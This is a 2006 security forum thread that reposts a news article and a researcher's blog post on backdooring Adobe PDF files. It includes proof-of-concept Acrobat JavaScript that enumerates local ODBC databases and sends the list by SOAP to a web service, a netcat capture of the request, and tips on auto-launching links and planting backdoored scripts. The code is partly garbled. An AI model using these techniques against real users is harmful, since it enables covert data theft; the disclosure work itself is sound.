Paid Advertising is
ha.ckers sla.cking
If you have some interesting news or want to throw up a link to discuss it, here's the place. Anything is okay, even shameless vendor launches (since that is often applicable to what we work on). 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Hacker Discovers Adobe PDF Back Doors
Posted by: digi7al64
Date: September 19, 2006 01:40AM

Nice little article on how we can use Adobe Pdf's to launch new browser windows and query local databases.


A British security researcher has figured out a way to manipulate legitimate features in Adobe PDF files to open back doors for computer attacks.

David Kierznowski, a penetration testing expert specializing in Web application testing, has released proof-of-concept code and rigged PDF files to demonstrate how the Adobe Reader program could be used to launch attacks without any user action.

ADVERTISEMENT "I do not really consider these attacks as vulnerabilities within Adobe. It is more exploiting features supported by the product that were never designed for this," Kierznowski said in an e-mail interview with eWEEK.

The first back door (PDF), which eWEEK confirmed on a fully patched version of Adobe Reader, involves adding a malicious link to a PDF file. Once the document is opened, the target's browser is automatically launched and loads the embedded link.

"At this point, it is obvious that any malicious code [can] be launched," Kierznowski said.

The use of Web-based exploits to launch drive-by malware downloads is a well-known tactic and the discovery of PDF back doors is further confirmation that desktop programs have become lucrative targets for corporate espionage and other targeted attacks.

A second back door demo (PDF) presents an attack scenario that uses Adobe Systems' ADBC (Adobe Database Connectivity) and Web Services support. Kierznowski said the back door can be used to exploit a fully patched version of Adobe Professional.

For advice on how to secure your network and applications, as well as the latest security news, visit Ziff Davis Internet's Security IT Hub.

"The second attack accesses the Windows ODBC (on localhost), enumerates available databases and then sends this information to 'localhost' via the Web service. This attack could be expanded to perform actual database queries. Imagine attackers accessing your internal databases via a user's Web browser," he said.

Kierznowski claims there are at least seven more points in PDF files where an attacker can launch malicious code. "[With] a bit more creativity, even simpler and/or more advanced attacks could be put together," he said, noting that Adobe Acrobat supports the use of "HTML forms" and "File system access."

"One of the other interesting finds was the fact that you can back-door all Adobe Acrobat files by loading a back-doored JavaScript file into [a local] directory," Kierznowski said in a blog entry that includes the proof-of-concept exploit code.

A spokesperson from Adobe's product security incident response team said the company is aware of Kierznowski's discovery and is "actively investigating" the issue.

"If Adobe confirms that a vulnerability might affect one of our products, details of the security vulnerability and an appropriate solution [will be] documented and published," the company, headquartered in San Jose, Calif., said in a statement sent to eWEEK.

Kierznowski said his interest in auditing PDF files for back doors comes from a fascination with the concept of "passive hacking."

"Active exploitation techniques such as buffer overflows are becoming more and more difficult to find and exploit ... The future of exploitation lies in Web technologies," he said, noting that internal users are often in a "relationship of trust" with the surrounding network.

Confirming a trend that sees Microsoft Office applications¡ªWord, Excel, PowerPoint¡ªused in zero-day attacks, Kierznowski sees a future of client-side hacking that expands the functionality of a service.

"This form of hacking merely manipulates the user's client to perform a certain function, effectively using the user's circle of trust," he said.

Links to the PDF's

His Blog Entry

Backdooring PDF Files

Recently, there has been alot of hype involving backdooring various web technologies. pdp (arcitect) has done alot of work centered around this area.

I saw Jeremiah Grossman mention PDF¡¯s being ¡°BAD¡±, however, I was unable to easily locate any practical reasons as to why. I decided to investigate this a little further.

At first glance PDF documents seem obviously vulnerable. This is due to the fact that it supports JavaScript. However, there are quite a few twists and turns. It is by no means as straight forward as this.

Adobe supports its own JavaScript object model. For example, ¡°alert(¡¯xss¡¯)¡± must be called from the app object, so this becomes ¡°app.alert(¡¯xss¡¯)¡±. This means JavaScript attacks are limited to the functionality supported within Adobe. Secondly, Adobe Reader and Adobe Professional (the two apps I focus on in this article) are very different with regards to which JavaScript objects are allowed.

This article will give two practical examples of how Adobe Professional and Adobe Reader can be backdoored. There are 7 or more points where an attacker can launch malicious code. Both of the attacks discussed below are attached to the ¡°Page Open¡± event.

The trigger can be accessed via ¡°Page Properties | Actions tab¡±.

The first attack is simple and affects both Adobe Reader and Adobe Professional. It involves adding a malicious link into the PDF document. Once the document is opened, the user¡¯s browser is automatically launched and the link is accessed. At this point it is obvious that any malicious code be launched. It is interesting to note that both Adobe 6 & 7 did not warn me before launching these URLs.

The second attack involves utilising Adobe¡¯s ADBC (Adobe Database Connectivity) and Web Services support. The following proof of concept code accesses the Windows ODBC, enumerates available databases and then sends this information to ¡°localhost¡± via the web service.

var cURL = ¡°http://localhost/¡±;
var cTestString = ¡°¡±;

var databaseList = ADBC.getDataSourceList();

var DB = ¡°¡±;
if (databaseList != null) {
for (var i=0; i;

cTestString = DB;

var response = SOAP.request( {
oRequest: {
"http://myxmlns/:echoString": {
inputString: cTestString
cAction: "http://additional-opt/"

var result = response["http://no-need/:echoStringResponse"]["return"];

On the server side we get this:
$ ./nc.exe -l -p 80 -v
listening on [any] 80 ¡­
connect to [] from localhost [] 1924
Accept: */*
Content-Type: text/xml; charset=UTF-8
SOAPAction: ¡°http://additional-opt/¡±
Content-Length: 578
User-Agent: Mozilla/3.0 (compatible; Acrobat SOAP 7.0)
Host: localhost
Connection: Keep-Alive
Cache-Control: no-cache

<?xml version=¡±1.0¡å?>
<SOAP-ENV:Envelope xmlns:SOAP-ENC=¡±¡± xm
lns:SOAP-ENV=¡±¡± xmlns:xsd=¡±http://www.w¡± xmlns:xsi=¡±¡±><SOA
P-ENV:Body><ns0:echoString SOAP-ENV:encodingStyle=¡±
ap/encoding/¡± xmlns:ns0=¡±http://myxmlns/¡±><inputString xsi:type=¡±xsd:string¡±>MS
Access 97 DatabaseFoxPro FilesText FilesMS Access DatabaseExcel FilesdBASE Files

I am sure with a bit more creativity even simpler and/or more advanced attacks could be put together. Adobe Acrabat supports, ¡°HTML forms¡±, ¡°File system access¡± and the list goes on.
One of the other interesting finds was the fact that you can backdoor all Adobe Acrabat files by loading a backdoored JavaScript file into your %ADOBE-VERSION-DIR%\Acrobat\Javascripts directory

'Just because you got the bacon, lettuce, and tomato don't mean I'm gonna give you my toast.'

Options: ReplyQuote
Re: Hacker Discovers Adobe PDF Back Doors
Posted by: rsnake
Date: September 19, 2006 10:23AM

Actually this fits rather well into one of my more recent blog posts, I just realized. The original question was about hacking a database that had IP filtering enabled. Well as this has DB access it even further helps get around those restrictions. Pretty cool, and great work from Michael Daw! I've been meaning to write something about this for a while, but didn't quite get around it. Thanks for bringing it up again, digi7al64.

- RSnake
Gotta love it.

Options: ReplyQuote

Sorry, only registered users may post in this forum.